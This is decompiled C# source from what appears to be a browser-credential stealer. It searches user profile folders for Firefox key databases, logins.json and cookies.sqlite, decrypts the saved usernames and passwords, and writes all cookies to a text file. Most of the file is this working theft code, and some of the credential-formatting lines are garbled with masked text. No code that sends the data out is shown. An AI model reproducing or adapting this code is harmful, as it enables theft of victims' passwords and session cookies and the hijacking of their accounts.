// Token: 0x060001EF RID: 495 RVA: 0x0000ED08 File Offset: 0x0000CF08
public static void Cookies()
{
List <string> list = new List <string>();
list.AddRange(Steal.FindPaths(Steal.LocalAppData, 4, 1, new string[]
{
"key3.db",
"key4.db",
"cookies.sqlite",
"logins.json"
}));
list.AddRange(Steal.FindPaths(Steal.RoamingAppData, 4, 1, new string[]
{
"key3.db",
"key4.db",
"cookies.sqlite",
"logins.json"
}));
foreach (string text in list)
{
string fullName = new FileInfo(text).Directory.FullName;
string browser_name = text.Contains(Steal.RoamingAppData) ? Steal.prbn(fullName) : Steal.plbn(fullName);
string name = Steal.GetName(fullName);
Steal.CookMhn(fullName, browser_name, name);
string text2 = "";
foreach (string str in Steal.Cookies_Gecko)
{
text2 += str;
}
if (text2 != "")
{
File.WriteAllText(Help.Cookies + "\\Cookies_Mozilla.txt", text2, Encoding.Default);
}
}
}
// Token: 0x060001F5 RID: 501 RVA: 0x0000F250 File Offset: 0x0000D450
public static void Lopos(string profile, byte[] privateKey, string browser_name, string profile_name)
{
try
{
string path = Steal.CreateTempCopy(Path.Combine(profile, "logins.json"));
if (File.Exists(path))
{
foreach (object obj in ((IEnumerable)File.ReadAllText(path).FromJSON()["logins"]))
{
JsonValue jsonValue = (JsonValue)obj;
Gecko4 gecko = Gecko1.Create(Convert.FromBase64String(jsonValue["encryptedUsername"].ToString(false)));
Gecko4 gecko2 = Gecko1.Create(Convert.FromBase64String(jsonValue["encryptedPassword"].ToString(false)));
string text = Regex.Replace(Gecko6.lTRjlt(privateKey, gecko.Objects[0].Objects[1].Objects[1].ObjectData, gecko.Objects[0].Objects[2].ObjectData, PaddingMode.PKCS7), "[^\\u0020-\\u007F]", string.Empty);
string text2 = Regex.Replace(Gecko6.lTRjlt(privateKey, gecko2.Objects[0].Objects[1].Objects[1].ObjectData, gecko2.Objects[0].Objects[2].ObjectData, PaddingMode.PKCS7), "[^\\u0020-\\u007F]", string.Empty);
Steal.credential.Add(string.Concat(new string[]
{
"URL : ",
jsonValue["hostname"],
Environment.NewLine,
"Login: "******"Password: "******"URL : ",
jsonValue["hostname"],
Environment.NewLine,
"Login: "******"Password: "******"Browser : ",
browser_name,
Environment.NewLine,
"Profile : ",
profile_name,
Environment.NewLine,
Steal.credential[i]
}));
}
Steal.credential.Clear();
}
}
catch (Exception)
{
}
}
// Token: 0x060001F2 RID: 498 RVA: 0x0000F040 File Offset: 0x0000D240
public static string CreateTempCopy(string filePath)
{
string text = Steal.CreateTempPath();
File.Copy(filePath, text, true);
return(text);
}
// Token: 0x060001ED RID: 493 RVA: 0x0000EB60 File Offset: 0x0000CD60
public static List <string> FindPaths(string baseDirectory, int maxLevel = 4, int level = 1, params string[] files)
{
List <string> list = new List <string>();
if (files == null || files.Length == 0 || level > maxLevel)
{
return(list);
}
List <string> result;
try
{
foreach (string path in Directory.GetDirectories(baseDirectory))
{
try
{
DirectoryInfo directoryInfo = new DirectoryInfo(path);
FileInfo[] files2 = directoryInfo.GetFiles();
bool flag = false;
int num = 0;
while (num < files2.Length && !flag)
{
int num2 = 0;
while (num2 < files.Length && !flag)
{
string a = files[num2];
FileInfo fileInfo = files2[num];
if (a == fileInfo.Name)
{
flag = true;
list.Add(fileInfo.FullName);
}
num2++;
}
num++;
}
foreach (string item in Steal.FindPaths(directoryInfo.FullName, maxLevel, level + 1, files))
{
if (!list.Contains(item))
{
list.Add(item);
}
}
}
catch
{
}
}
result = list;
}
catch
{
result = list;
}
return(result);
}
// Token: 0x06000252 RID: 594 RVA: 0x00011240 File Offset: 0x0000F440
public static void GetGecko()
{
try
{
Steal.Cookies();
Steal.Passwords();
}
catch
{
}
}
// Token: 0x060001EE RID: 494 RVA: 0x0000EC98 File Offset: 0x0000CE98
public static void Creds(string profile, string browser_name, string profile_name)
{
try
{
if (File.Exists(Path.Combine(profile, "key3.db")))
{
Steal.Lopos(profile, Steal.p3k(Steal.CreateTempCopy(Path.Combine(profile, "key3.db"))), browser_name, profile_name);
}
Steal.Lopos(profile, Steal.p4k(Steal.CreateTempCopy(Path.Combine(profile, "key4.db"))), browser_name, profile_name);
}
catch (Exception)
{
}
}
// Token: 0x060001F7 RID: 503 RVA: 0x0000F760 File Offset: 0x0000D960
private static byte[] p3k(string file)
{
byte[] array = new byte[24];
byte[] result;
try
{
if (!File.Exists(file))
{
result = array;
}
else
{
new DataTable();
Gecko9 berkeleyDB = new Gecko9(file);
Gecko7 gecko = new Gecko7(Steal.vbv(berkeleyDB, (string x) => x.Equals("password-check")));
string hexString = Steal.vbv(berkeleyDB, (string x) => x.Equals("global-salt"));
Gecko8 gecko2 = new Gecko8(Steal.ConvertHexStringToByteArray(hexString), Encoding.Default.GetBytes(string.Empty), Steal.ConvertHexStringToByteArray(gecko.EntrySalt));
gecko2.го7па();
Gecko6.lTRjlt(gecko2.DataKey, gecko2.DataIV, Steal.ConvertHexStringToByteArray(gecko.Passwordcheck), PaddingMode.None);
Gecko4 gecko3 = Gecko1.Create(Steal.ConvertHexStringToByteArray(Steal.vbv(berkeleyDB, (string x) => !x.Equals("password-check") && !x.Equals("Version") && !x.Equals("global-salt"))));
Gecko8 gecko4 = new Gecko8(Steal.ConvertHexStringToByteArray(hexString), Encoding.Default.GetBytes(string.Empty), gecko3.Objects[0].Objects[0].Objects[1].Objects[0].ObjectData);
gecko4.го7па();
Gecko4 gecko5 = Gecko1.Create(Gecko1.Create(Encoding.Default.GetBytes(Gecko6.lTRjlt(gecko4.DataKey, gecko4.DataIV, gecko3.Objects[0].Objects[1].ObjectData, PaddingMode.None))).Objects[0].Objects[2].ObjectData);
if (gecko5.Objects[0].Objects[3].ObjectData.Length <= 24)
{
array = gecko5.Objects[0].Objects[3].ObjectData;
result = array;
}
else
{
Array.Copy(gecko5.Objects[0].Objects[3].ObjectData, gecko5.Objects[0].Objects[3].ObjectData.Length - 24, array, 0, 24);
result = array;
}
}
}
catch (Exception)
{
result = array;
}
return(result);
}
// Token: 0x060001F4 RID: 500 RVA: 0x0000F0BC File Offset: 0x0000D2BC
public static void CookMhn(string profile, string browser_name, string profile_name)
{
try
{
CNT cnt = new CNT(Steal.CreateTempCopy(Path.Combine(profile, "cookies.sqlite")));
cnt.ReadTable("moz_cookies");
for (int i = 0; i < cnt.RowLength; i++)
{
try
{
Steal.domains.Add(cnt.ParseValue(i, "host").Trim());
Steal.Cookies_Gecko.Add(string.Concat(new string[]
{
cnt.ParseValue(i, "host").Trim(),
"\t",
(cnt.ParseValue(i, "isSecure") == "1").ToString(),
"\t",
cnt.ParseValue(i, "path").Trim(),
"\t",
(cnt.ParseValue(i, "isSecure") == "1").ToString(),
"\t",
cnt.ParseValue(i, "expiry").Trim(),
"\t",
cnt.ParseValue(i, "name").Trim(),
"\t",
cnt.ParseValue(i, "value"),
Environment.NewLine
}));
}
catch
{
}
}
}
catch (Exception)
{
}
}